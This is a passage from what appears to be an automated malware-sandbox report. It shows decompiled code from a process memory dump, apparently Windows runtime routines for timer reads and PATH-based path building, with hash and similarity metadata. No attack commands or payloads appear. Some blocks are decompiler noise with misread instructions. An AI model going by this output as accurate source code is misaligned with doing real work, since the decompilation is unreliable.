                    									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                    									L23:
                    									 *(_t114 - 0x94) = _t109;
                    									goto L26;
                    								}
                    								__eflags = _t104 - _t92;
                    								if(__eflags > 0) {
                    									goto L21;
                    								}
                    								if(__eflags == 0) {
                    									goto L22;
                    								}
                    								goto L23;
                    							}
                    							goto L15;
                    						}
                    					}
                    					__eflags = _t109;
                    					if(_t109 >= 0) {
                    						goto L31;
                    					}
                    					__eflags = _t109 - 0x80000005;
                    					if(_t109 != 0x80000005) {
                    						goto L31;
                    					}
                    					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                    					_t38 = _t95 - 1; // -129
                    					_t99 = _t38;
                    					goto L34;
                    				}
                    				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                    					__eflags = __edx - 0x65;
                    					if(__edx != 0x65) {
                    						goto L2;
                    					}
                    					goto L6;
                    				}
                    				L2:
                    				_push( *((intOrPtr*)(_t114 + 8)));
                    				_push(_t106);
                    				if(E016AA890() != 0) {
                    					goto L6;
                    				}
                    				goto L3;
                    			}
                    0x016c4917
                    0x016c4917
                    0x00000000
                    0x016c4917
                    0x0166b1ba
                    0x016c47f9
                    0x016c47fc
                    0x00000000
                    0x00000000
                    0x00000000
                    0x016c47fc
                    0x0166b1c0
                    0x0166b1c0
                    0x0166b1c3
                    0x0166b1cb
                    0x00000000
                    0x00000000
                    0x00000000

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: _vswprintf_s
                    • String ID:
                    • API String ID: 677850445-0
                    • Opcode ID: 2c9a9764130eab132104aed93972ff947cbd7400db51866155941de81b87da0c
                    • Instruction ID: f21170c8ffa5a3d3ccad56ae2b7527d1a700b4d0aee12ef95e9c1288687bc089
                    • Opcode Fuzzy Hash: 2c9a9764130eab132104aed93972ff947cbd7400db51866155941de81b87da0c
                    • Instruction Fuzzy Hash: 9B51B075D012698AEB31CF688C54BFEBBB1EF04B10F1142ADD859AB382DB718941CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 76%
                    			E0168B944(signed int* __ecx, char __edx) {
                    				signed int _v8;
                    				signed int _v16;
                    				signed int _v20;
                    				char _v28;
                    				signed int _v32;
                    				char _v36;
                    				signed int _v40;
                    				intOrPtr _v44;
                    				signed int* _v48;
                    				signed int _v52;
                    				signed int _v56;
                    				intOrPtr _v60;
                    				intOrPtr _v64;
                    				intOrPtr _v68;
                    				intOrPtr _v72;
                    				intOrPtr _v76;
                    				char _v77;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				intOrPtr* _t65;
                    				intOrPtr _t67;
                    				intOrPtr _t68;
                    				char* _t73;
                    				intOrPtr _t77;
                    				intOrPtr _t78;
                    				signed int _t82;
                    				intOrPtr _t83;
                    				void* _t87;
                    				char _t88;
                    				intOrPtr* _t89;
                    				intOrPtr _t91;
                    				void* _t97;
                    				intOrPtr _t100;
                    				void* _t102;
                    				void* _t107;
                    				signed int _t108;
                    				intOrPtr* _t112;
                    				void* _t113;
                    				intOrPtr* _t114;
                    				intOrPtr _t115;
                    				intOrPtr _t116;
                    				intOrPtr _t117;
                    				signed int _t118;
                    				void* _t130;
                    
                    				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                    				_v8 =  *0x175d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                    				_t112 = __ecx;
                    				_v77 = __edx;
                    				_v48 = __ecx;
                    				_v28 = 0;
                    				_t5 = _t112 + 0xc; // 0x575651ff
                    				_t105 =  *_t5;
                    				_v20 = 0;
                    				_v16 = 0;
                    				if(_t105 == 0) {
                    					_t50 = _t112 + 4; // 0x5de58b5b
                    					_t60 =  *__ecx |  *_t50;
                    					if(( *__ecx |  *_t50) != 0) {
                    						 *__ecx = 0;
                    						__ecx[1] = 0;
                    						if(E01687D50() != 0) {
                    							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                    						} else {
                    							_t65 = 0x7ffe0386;
                    						}
                    						if( *_t65 != 0) {
                    							E01738CD6(_t112);
                    						}
                    						_push(0);
                    						_t52 = _t112 + 0x10; // 0x778df98b
                    						_push( *_t52);
                    						_t60 = E016A9E20();
                    					}
                    					L20:
                    					_pop(_t107);
                    					_pop(_t113);
                    					_pop(_t87);
                    					return E016AB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                    				}
                    				_t8 = _t112 + 8; // 0x8b000cc2
                    				_t67 =  *_t8;
                    				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                    				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                    				_t108 =  *(_t67 + 0x14);
                    				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                    				_t105 = 0x2710;
                    				asm("sbb eax, edi");
                    				_v44 = _t88;
                    				_v52 = _t108;
                    				_t60 = E016ACE00(_t97, _t68, 0x2710, 0);
                    				_v56 = _t60;
                    				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                    					L3:
                    					 *(_t112 + 0x44) = _t60;
                    					_t105 = _t60 * 0x2710 >> 0x20;
                    					 *_t112 = _t88;
                    					 *(_t112 + 4) = _t108;
                    					_v20 = _t60 * 0x2710;
                    					_v16 = _t60 * 0x2710 >> 0x20;
                    					if(_v77 != 0) {
                    						L16:
                    						_v36 = _t88;
                    						_v32 = _t108;
                    						if(E01687D50() != 0) {
                    							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                    						} else {
                    							_t73 = 0x7ffe0386;
                    						}
                    						if( *_t73 != 0) {
                    							_t105 = _v40;
                    							E01738F6A(_t112, _v40, _t88, _t108);
                    						}
                    						_push( &_v28);
                    						_push(0);
                    						_push( &_v36);
                    						_t48 = _t112 + 0x10; // 0x778df98b
                    						_push( *_t48);
                    						_t60 = E016AAF60();
                    						goto L20;
                    					} else {
                    						_t89 = 0x7ffe03b0;
                    						do {
                    							_t114 = 0x7ffe0010;
                    							do {
                    								_t77 =  *0x1758628; // 0x0
                    								_v68 = _t77;
                    								_t78 =  *0x175862c; // 0x0
                    								_v64 = _t78;
                    								_v72 =  *_t89;
                    								_v76 =  *((intOrPtr*)(_t89 + 4));
                    								while(1) {
                    									_t105 =  *0x7ffe000c;
                    									_t100 =  *0x7ffe0008;
                    									if(_t105 ==  *_t114) {
                    										goto L8;
                    									}
                    									asm("pause");
                    								}
                    								L8:
                    								_t89 = 0x7ffe03b0;
                    								_t115 =  *0x7ffe03b0;
                    								_t82 =  *0x7FFE03B4;
                    								_v60 = _t115;
                    								_t114 = 0x7ffe0010;
                    								_v56 = _t82;
                    							} while (_v72 != _t115 || _v76 != _t82);
                    							_t83 =  *0x1758628; // 0x0
                    							_t116 =  *0x175862c; // 0x0
                    							_v76 = _t116;
                    							_t117 = _v68;
                    						} while (_t117 != _t83 || _v64 != _v76);
                    						asm("sbb edx, [esp+0x24]");
                    						_t102 = _t100 - _v60 - _t117;
                    						_t112 = _v48;
                    						_t91 = _v44;
                    						asm("sbb edx, eax");
                    						_t130 = _t105 - _v52;
                    						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                    							_t88 = _t102 - _t91;
                    							asm("sbb edx, edi");
                    							_t108 = _t105;
                    						} else {
                    							_t88 = 0;
                    							_t108 = 0;
                    						}
                    						goto L16;
                    					}
                    				} else {
                    					if( *(_t112 + 0x44) == _t60) {
                    						goto L20;
                    					}
                    					goto L3;
                    				}
                    			}


                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0168B9A5
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID:
                    • API String ID: 885266447-0
                    • Opcode ID: 38696dd86eda2b5952647f0cb3ea0012d23441d4f4d967c47c4d6338eb3a9b51
                    • Instruction ID: 5103ea5a47eaa2c5d585913713879a115a12811bc823d78228cd937234ab9e93
                    • Opcode Fuzzy Hash: 38696dd86eda2b5952647f0cb3ea0012d23441d4f4d967c47c4d6338eb3a9b51
                    • Instruction Fuzzy Hash: D1515A71A08741CFC720EF29C89092AFBE5FB88610F148A6EF99587355D771EC44CB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 83%
                    			E01692581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1530200421) {
                    				signed int _v8;
                    				signed int _v16;
                    				unsigned int _v24;
                    				void* _v28;
                    				signed int _v32;
                    				unsigned int _v36;
                    				signed int _v37;
                    				signed int _v40;
                    				signed int _v44;
                    				signed int _v48;
                    				signed int _v52;
                    				signed int _v56;
                    				intOrPtr _v60;
                    				signed int _v64;
                    				signed int _v68;
                    				signed int _v72;
                    				signed int _v76;
                    				signed int _v80;
                    				signed int _t235;
                    				signed int _t239;
                    				char* _t242;
                    				signed int _t249;
                    				signed int _t251;
                    				intOrPtr _t253;
                    				signed int _t256;
                    				signed int _t263;
                    				signed int _t266;
                    				signed int _t274;
                    				signed int _t276;
                    				intOrPtr _t281;
                    				signed int _t283;
                    				signed int _t285;
                    				void* _t286;
                    				signed int _t287;
                    				unsigned int _t290;
                    				signed int _t294;
                    				signed int* _t295;
                    				signed int _t296;
                    				signed int _t300;
                    				intOrPtr _t312;
                    				signed int _t321;
                    				signed int _t323;
                    				signed int _t324;
                    				signed int _t328;
                    				signed int _t329;
                    				void* _t333;
                    				signed int _t334;
                    				signed int _t336;
                    				signed int _t339;
                    				void* _t340;
                    
                    				_t336 = _t339;
                    				_t340 = _t339 - 0x4c;
                    				_v8 =  *0x175d360 ^ _t336;
                    				_push(__ebx);
                    				_push(__esi);
                    				_push(__edi);
                    				_t328 = 0x175b2e8;
                    				_v56 = _a4;
                    				_v48 = __edx;
                    				_v60 = __ecx;
                    				_t290 = 0;
                    				_v80 = 0;
                    				asm("movsd");
                    				_v64 = 0;
                    				_v76 = 0;
                    				_v72 = 0;
                    				asm("movsd");
                    				_v44 = 0;
                    				_v52 = 0;
                    				_v68 = 0;
                    				asm("movsd");
                    				_v32 = 0;
                    				_v36 = 0;
                    				asm("movsd");
                    				_v16 = 0;
                    				_t281 = 0x48;
                    				_t310 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
                    				_t321 = 0;
                    				_v37 = _t310;
                    				if(_v48 <= 0) {
                    					L16:
                    					_t45 = _t281 - 0x48; // 0x0
                    					__eflags = _t45 - 0xfffe;
                    					if(_t45 > 0xfffe) {
                    						_t329 = 0xc0000106;
                    						goto L32;
                    					} else {
                    						_t328 = L01684620(_t290,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t281);
                    						_v52 = _t328;
                    						__eflags = _t328;
                    						if(_t328 == 0) {
                    							_t329 = 0xc0000017;
                    							goto L32;
                    						} else {
                    							 *(_t328 + 0x44) =  *(_t328 + 0x44) & 0x00000000;
                    							_t50 = _t328 + 0x48; // 0x48
                    							_t323 = _t50;
                    							_t310 = _v32;
                    							 *((intOrPtr*)(_t328 + 0x3c)) = _t281;
                    							_t283 = 0;
                    							 *((short*)(_t328 + 0x30)) = _v48;
                    							__eflags = _t310;
                    							if(_t310 != 0) {
                    								 *(_t328 + 0x18) = _t323;
                    								__eflags = _t310 - 0x1758478;
                    								 *_t328 = ((0 | _t310 == 0x01758478) - 0x00000001 & 0xfffffffb) + 7;
                    								E016AF3E0(_t323,  *((intOrPtr*)(_t310 + 4)),  *_t310 & 0x0000ffff);
                    								_t310 = _v32;
                    								_t340 = _t340 + 0xc;
                    								_t283 = 1;
                    								__eflags = _a8;
                    								_t323 = _t323 + (( *_t310 & 0x0000ffff) >> 1) * 2;
                    								if(_a8 != 0) {
                    									_t274 = E016F39F2(_t323);
                    									_t310 = _v32;
                    									_t323 = _t274;
                    								}
                    							}
                    							_t294 = 0;
                    							_v16 = 0;
                    							__eflags = _v48;
                    							if(_v48 <= 0) {
                    								L31:
                    								_t329 = _v68;
                    								__eflags = 0;
                    								 *((short*)(_t323 - 2)) = 0;
                    								goto L32;
                    							} else {
                    								_t285 = _t328 + _t283 * 4;
                    								_v56 = _t285;
                    								do {
                    									__eflags = _t310;
                    									if(_t310 != 0) {
                    										_t235 =  *(_v60 + _t294 * 4);
                    										__eflags = _t235;
                    										if(_t235 == 0) {
                    											goto L30;
                    										} else {
                    											__eflags = _t235 == 5;
                    											if(_t235 == 5) {
                    												goto L30;
                    											} else {
                    												goto L22;
                    											}
                    										}
                    									} else {
                    										L22:
                    										 *_t285 =  *(_v60 + _t294 * 4);
                    										 *(_t285 + 0x18) = _t323;
                    										_t239 =  *(_v60 + _t294 * 4);
                    										__eflags = _t239 - 8;
                    										if(_t239 > 8) {
                    											goto L56;
                    										} else {
                    											switch( *((intOrPtr*)(_t239 * 4 +  &M01692959))) {
                    												case 0:
                    													__ax =  *0x1758488;
                    													__eflags = __ax;
                    													if(__ax == 0) {
                    														goto L29;
                    													} else {
                    														__ax & 0x0000ffff = E016AF3E0(__edi,  *0x175848c, __ax & 0x0000ffff);
                    														__eax =  *0x1758488 & 0x0000ffff;
                    														goto L26;
                    													}
                    													goto L108;
                    												case 1:
                    													L45:
                    													E016AF3E0(_t323, _v80, _v64);
                    													_t269 = _v64;
                    													goto L26;
                    												case 2:
                    													 *0x1758480 & 0x0000ffff = E016AF3E0(__edi,  *0x1758484,  *0x1758480 & 0x0000ffff);
                    													__eax =  *0x1758480 & 0x0000ffff;
                    													__eax = ( *0x1758480 & 0x0000ffff) >> 1;
                    													__edi = __edi + __eax * 2;
                    													goto L28;
                    												case 3:
                    													__eax = _v44;
                    													__eflags = __eax;
                    													if(__eax == 0) {
                    														goto L29;
                    													} else {
                    														__esi = __eax + __eax;
                    														__eax = E016AF3E0(__edi, _v72, __esi);
                    														__edi = __edi + __esi;
                    														__esi = _v52;
                    														goto L27;
                    													}
                    													goto L108;
                    												case 4:
                    													_push(0x2e);
                    													_pop(__eax);
                    													 *(__esi + 0x44) = __edi;
                    													 *__edi = __ax;
                    													__edi = __edi + 4;
                    													_push(0x3b);
                    													_pop(__eax);
                    													 *(__edi - 2) = __ax;
                    													goto L29;
                    												case 5:
                    													__eflags = _v36;
                    													if(_v36 == 0) {
                    														goto L45;
                    													} else {
                    														E016AF3E0(_t323, _v76, _v36);
                    														_t269 = _v36;
                    													}
                    													L26:
                    													_t340 = _t340 + 0xc;
                    													_t323 = _t323 + (_t269 >> 1) * 2 + 2;
                    													__eflags = _t323;
                    													L27:
                    													_push(0x3b);
                    													_pop(_t271);
                    													 *((short*)(_t323 - 2)) = _t271;
                    													goto L28;
                    												case 6:
                    													__ebx = "\\WWw\\WWw";
                    													__eflags = __ebx - "\\WWw\\WWw";
                    													if(__ebx != "\\WWw\\WWw") {
                    														_push(0x3b);
                    														_pop(__esi);
                    														do {
                    															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                    															E016AF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                    															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                    															__edi = __edi + __eax * 2;
                    															__edi = __edi + 2;
                    															 *(__edi - 2) = __si;
                    															__ebx =  *__ebx;
                    															__eflags = __ebx - "\\WWw\\WWw";
                    														} while (__ebx != "\\WWw\\WWw");
                    														__esi = _v52;
                    														__ecx = _v16;
                    														__edx = _v32;
                    													}
                    													__ebx = _v56;
                    													goto L29;
                    												case 7:
                    													 *0x1758478 & 0x0000ffff = E016AF3E0(__edi,  *0x175847c,  *0x1758478 & 0x0000ffff);
                    													__eax =  *0x1758478 & 0x0000ffff;
                    													__eax = ( *0x1758478 & 0x0000ffff) >> 1;
                    													__eflags = _a8;
                    													__edi = __edi + __eax * 2;
                    													if(_a8 != 0) {
                    														__ecx = __edi;
                    														__eax = E016F39F2(__ecx);
                    														__edi = __eax;
                    													}
                    													goto L28;
                    												case 8:
                    													__eax = 0;
                    													 *(__edi - 2) = __ax;
                    													 *0x1756e58 & 0x0000ffff = E016AF3E0(__edi,  *0x1756e5c,  *0x1756e58 & 0x0000ffff);
                    													 *(__esi + 0x38) = __edi;
                    													__eax =  *0x1756e58 & 0x0000ffff;
                    													__eax = ( *0x1756e58 & 0x0000ffff) >> 1;
                    													__edi = __edi + __eax * 2;
                    													__edi = __edi + 2;
                    													L28:
                    													_t294 = _v16;
                    													_t310 = _v32;
                    													L29:
                    													_t285 = _t285 + 4;
                    													__eflags = _t285;
                    													_v56 = _t285;
                    													goto L30;
                    											}
                    										}
                    									}
                    									goto L108;
                    									L30:
                    									_t294 = _t294 + 1;
                    									_v16 = _t294;
                    									__eflags = _t294 - _v48;
                    								} while (_t294 < _v48);
                    								goto L31;
                    							}
                    						}
                    					}
                    				} else {
                    					while(1) {
                    						L1:
                    						_t276 =  *(_v60 + _t321 * 4);
                    						if(_t276 > 8) {
                    							break;
                    						}
                    						switch( *((intOrPtr*)(_t276 * 4 +  &M01692935))) {
                    							case 0:
                    								__ax =  *0x1758488;
                    								__eflags = __ax;
                    								if(__ax != 0) {
                    									__eax = __ax & 0x0000ffff;
                    									__ebx = __ebx + 2;
                    									__eflags = __ebx;
                    									goto L53;
                    								}
                    								goto L14;
                    							case 1:
                    								L44:
                    								_t310 =  &_v64;
                    								_v80 = E01692E3E(0,  &_v64);
                    								_t281 = _t281 + _v64 + 2;
                    								goto L13;
                    							case 2:
                    								__eax =  *0x1758480 & 0x0000ffff;
                    								__ebx = __ebx + __eax;
                    								__eflags = __dl;
                    								if(__dl != 0) {
                    									__eax = 0x1758480;
                    									goto L80;
                    								}
                    								goto L14;
                    							case 3:
                    								__eax = E0167EEF0(0x17579a0);
                    								__eax =  &_v44;
                    								_push(__eax);
                    								_push(0);
                    								_push(0);
                    								_push(4);
                    								_push(L"PATH");
                    								_push(0);
                    								L57();
                    								__esi = __eax;
                    								_v68 = __esi;
                    								__eflags = __esi - 0xc0000023;
                    								if(__esi != 0xc0000023) {
                    									L10:
                    									__eax = E0167EB70(__ecx, 0x17579a0);
                    									__eflags = __esi - 0xc0000100;
                    									if(__esi == 0xc0000100) {
                    										_v44 = _v44 & 0x00000000;
                    										__eax = 0;
                    										_v68 = 0;
                    										goto L13;
                    									} else {
                    										__eflags = __esi;
                    										if(__esi < 0) {
                    											L32:
                    											_t213 = _v72;
                    											__eflags = _t213;
                    											if(_t213 != 0) {
                    												L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t213);
                    											}
                    											_t214 = _v52;
                    											__eflags = _t214;
                    											if(_t214 != 0) {
                    												__eflags = _t329;
                    												if(_t329 < 0) {
                    													L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t214);
                    													_t214 = 0;
                    												}
                    											}
                    											goto L36;
                    										} else {
                    											__eax = _v44;
                    											__ebx = __ebx + __eax * 2;
                    											__ebx = __ebx + 2;
                    											__eflags = __ebx;
                    											L13:
                    											_t290 = _v36;
                    											goto L14;
                    										}
                    									}
                    								} else {
                    									__eax = _v44;
                    									__ecx =  *0x1757b9c; // 0x0
                    									_v44 + _v44 =  *[fs:0x30];
                    									__ecx = __ecx + 0x180000;
                    									__eax = L01684620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                    									_v72 = __eax;
                    									__eflags = __eax;
                    									if(__eax == 0) {
                    										__eax = E0167EB70(__ecx, 0x17579a0);
                    										__eax = _v52;
                    										L36:
                    										_pop(_t322);
                    										_pop(_t330);
                    										__eflags = _v8 ^ _t336;
                    										_pop(_t282);
                    										return E016AB640(_t214, _t282, _v8 ^ _t336, _t310, _t322, _t330);
                    									} else {
                    										__ecx =  &_v44;
                    										_push(__ecx);
                    										_push(_v44);
                    										_push(__eax);
                    										_push(4);
                    										_push(L"PATH");
                    										_push(0);
                    										L57();
                    										__esi = __eax;
                    										_v68 = __eax;
                    										goto L10;
                    									}
                    								}
                    								goto L108;
                    							case 4:
                    								__ebx = __ebx + 4;
                    								goto L14;
                    							case 5:
                    								_t277 = _v56;
                    								if(_v56 != 0) {
                    									_t310 =  &_v36;
                    									_t279 = E01692E3E(_t277,  &_v36);
                    									_t290 = _v36;
                    									_v76 = _t279;
                    								}
                    								if(_t290 == 0) {
                    									goto L44;
                    								} else {
                    									_t281 = _t281 + 2 + _t290;
                    								}
                    								goto L14;
                    							case 6:
                    								__eax =  *0x1755764 & 0x0000ffff;
                    								goto L53;
                    							case 7:
                    								__eax =  *0x1758478 & 0x0000ffff;
                    								__ebx = __ebx + __eax;
                    								__eflags = _a8;
                    								if(_a8 != 0) {
                    									__ebx = __ebx + 0x16;
                    									__ebx = __ebx + __eax;
                    								}
                    								__eflags = __dl;
                    								if(__dl != 0) {
                    									__eax = 0x1758478;
                    									L80:
                    									_v32 = __eax;
                    								}
                    								goto L14;
                    							case 8:
                    								__eax =  *0x1756e58 & 0x0000ffff;
                    								__eax = ( *0x1756e58 & 0x0000ffff) + 2;
                    								L53:
                    								__ebx = __ebx + __eax;
                    								L14:
                    								_t321 = _t321 + 1;
                    								if(_t321 >= _v48) {
                    									goto L16;
                    								} else {
                    									_t310 = _v37;
                    									goto L1;
                    								}
                    								goto L108;
                    						}
                    					}
                    					L56:
                    					_t295 = 0x25;
                    					asm("int 0x29");
                    					asm("out 0x28, al");
                    					asm("loopne 0x29");
                    					_t295[0] = _t295[0] - _t295;
                    					_t242 = 0x1f016926 +  *_t295 * 0x169262e;
                    					_pop(_t286);
                    					asm("insd");
                    					 *((intOrPtr*)(_t242 +  &_a1530200421)) =  *((intOrPtr*)(_t242 +  &_a1530200421)) + _t310;
                    					asm("insd");
                    					 *_t310 =  *_t310 + _t242;
                    					_t295[0] = _t295[0] - _t336;
                    					 *_t242 =  *_t242 - 0x69;
                    					asm("daa");
                    					_t333 = _t328 + 1 + _t328 + 1 - 1;
                    					_t295[0] = _t295[0] - _t295;
                    					asm("daa");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					_push(0x20);
                    					_push(0x173ff00);
                    					E016BD08C(_t286, _t323, _t333);
                    					_v44 =  *[fs:0x18];
                    					_t324 = 0;
                    					 *_a24 = 0;
                    					_t287 = _a12;
                    					__eflags = _t287;
                    					if(_t287 == 0) {
                    						_t249 = 0xc0000100;
                    					} else {
                    						_v8 = 0;
                    						_t334 = 0xc0000100;
                    						_v52 = 0xc0000100;
                    						_t251 = 4;
                    						while(1) {
                    							_v40 = _t251;
                    							__eflags = _t251;
                    							if(_t251 == 0) {
                    								break;
                    							}
                    							_t300 = _t251 * 0xc;
                    							_v48 = _t300;
                    							__eflags = _t287 -  *((intOrPtr*)(_t300 + 0x1641664));
                    							if(__eflags <= 0) {
                    								if(__eflags == 0) {
                    									_t266 = E016AE5C0(_a8,  *((intOrPtr*)(_t300 + 0x1641668)), _t287);
                    									_t340 = _t340 + 0xc;
                    									__eflags = _t266;
                    									if(__eflags == 0) {
                    										_t334 = E016E51BE(_t287,  *((intOrPtr*)(_v48 + 0x164166c)), _a16, _t324, _t334, __eflags, _a20, _a24);
                    										_v52 = _t334;
                    										break;
                    									} else {
                    										_t251 = _v40;
                    										goto L62;
                    									}
                    									goto L70;
                    								} else {
                    									L62:
                    									_t251 = _t251 - 1;
                    									continue;
                    								}
                    							}
                    							break;
                    						}
                    						_v32 = _t334;
                    						__eflags = _t334;
                    						if(_t334 < 0) {
                    							__eflags = _t334 - 0xc0000100;
                    							if(_t334 == 0xc0000100) {
                    								_t296 = _a4;
                    								__eflags = _t296;
                    								if(_t296 != 0) {
                    									_v36 = _t296;
                    									__eflags =  *_t296 - _t324;
                    									if( *_t296 == _t324) {
                    										_t334 = 0xc0000100;
                    										goto L76;
                    									} else {
                    										_t312 =  *((intOrPtr*)(_v44 + 0x30));
                    										_t253 =  *((intOrPtr*)(_t312 + 0x10));
                    										__eflags =  *((intOrPtr*)(_t253 + 0x48)) - _t296;
                    										if( *((intOrPtr*)(_t253 + 0x48)) == _t296) {
                    											__eflags =  *(_t312 + 0x1c);
                    											if( *(_t312 + 0x1c) == 0) {
                    												L106:
                    												_t334 = E01692AE4( &_v36, _a8, _t287, _a16, _a20, _a24);
                    												_v32 = _t334;
                    												__eflags = _t334 - 0xc0000100;
                    												if(_t334 != 0xc0000100) {
                    													goto L69;
                    												} else {
                    													_t324 = 1;
                    													_t296 = _v36;
                    													goto L75;
                    												}
                    											} else {
                    												_t256 = E01676600( *(_t312 + 0x1c));
                    												__eflags = _t256;
                    												if(_t256 != 0) {
                    													goto L106;
                    												} else {
                    													_t296 = _a4;
                    													goto L75;
                    												}
                    											}
                    										} else {
                    											L75:
                    											_t334 = E01692C50(_t296, _a8, _t287, _a16, _a20, _a24, _t324);
                    											L76:
                    											_v32 = _t334;
                    											goto L69;
                    										}
                    									}
                    									goto L108;
                    								} else {
                    									E0167EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                    									_v8 = 1;
                    									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                    									_t334 = _a24;
                    									_t263 = E01692AE4( &_v36, _a8, _t287, _a16, _a20, _t334);
                    									_v32 = _t263;
                    									__eflags = _t263 - 0xc0000100;
                    									if(_t263 == 0xc0000100) {
                    										_v32 = E01692C50(_v36, _a8, _t287, _a16, _a20, _t334, 1);
                    									}
                    									_v8 = _t324;
                    									E01692ACB();
                    								}
                    							}
                    						}
                    						L69:
                    						_v8 = 0xfffffffe;
                    						_t249 = _t334;
                    					}
                    					L70:
                    					return E016BD0D1(_t249);
                    				}
                    				L108:
                    			}


                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: PATH
                    • API String ID: 0-1036084923
                    • Opcode ID: 802454ccfaab2a65ec96a696d208815b4ce01bc004e0a4c1e82e9b6e443ebd23
                    • Instruction ID: dabd1d2d7a9f070fb0f57cef126a97dc5ab30ddd41b99dd6ecd531ba6cac62a2
                    • Opcode Fuzzy Hash: 802454ccfaab2a65ec96a696d208815b4ce01bc004e0a4c1e82e9b6e443ebd23
                    • Instruction Fuzzy Hash: D4C16AB1D00219ABDF25DF99DCA0ABDBBB9FF48710F44402DE901BB250D774A942CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 80%
                    			E0169FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                    				char _v5;
                    				signed int _v8;
                    				signed int _v12;
                    				char _v16;
                    				char _v17;
                    				char _v20;
                    				signed int _v24;
                    				char _v28;
                    				char _v32;
                    				signed int _v40;
                    				void* __ecx;
                    				void* __edi;
                    				void* __ebp;
                    				signed int _t73;
                    				intOrPtr* _t75;
                    				signed int _t77;
                    				signed int _t79;
                    				signed int _t81;
                    				intOrPtr _t83;
                    				intOrPtr _t85;
                    				intOrPtr _t86;
                    				signed int _t91;
                    				signed int _t94;
                    				signed int _t95;
                    				signed int _t96;
                    				signed int _t106;
                    				signed int _t108;
                    				signed int _t114;
                    				signed int _t116;
                    				signed int _t118;
                    				signed int _t122;
                    				signed int _t123;
                    				void* _t129;
                    				signed int _t130;
                    				void* _t132;
                    				intOrPtr* _t134;
                    				signed int _t138;
                    				signed int _t141;
                    				signed int _t147;
                    				intOrPtr _t153;
                    				signed int _t154;
                    				signed int _t155;
                    				signed int _t170;
                    				void* _t174;
                    				signed int _t176;
                    				signed int _t177;
                    
                    				_t129 = __ebx;
                    				_push(_t132);
                    				_push(__esi);
                    				_t174 = _t132;
                    				_t73 =  !( *( *(_t174 + 0x18)));
                    				if(_t73 >= 0) {
                    					L5:
                    					return _t73;
                    				} else {
                    					E0167EEF0(0x1757b60);
                    					_t134 =  *0x1757b84; // 0x77577b80
                    					_t2 = _t174 + 0x24; // 0x24
                    					_t75 = _t2;
                    					if( *_t134 != 0x1757b80) {
                    						_push(3);
                    						asm("int 0x29");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						_push(0x1757b60);
                    						_t170 = _v8;
                    						_v28 = 0;
                    						_v40 = 0;
                    						_v24 = 0;
                    						_v17 = 0;
                    						_v32 = 0;
                    						__eflags = _t170 & 0xffff7cf2;
                    						if((_t170 & 0xffff7cf2) != 0) {
                    							L43:
                    							_t77 = 0xc000000d;
                    						} else {
                    							_t79 = _t170 & 0x0000000c;
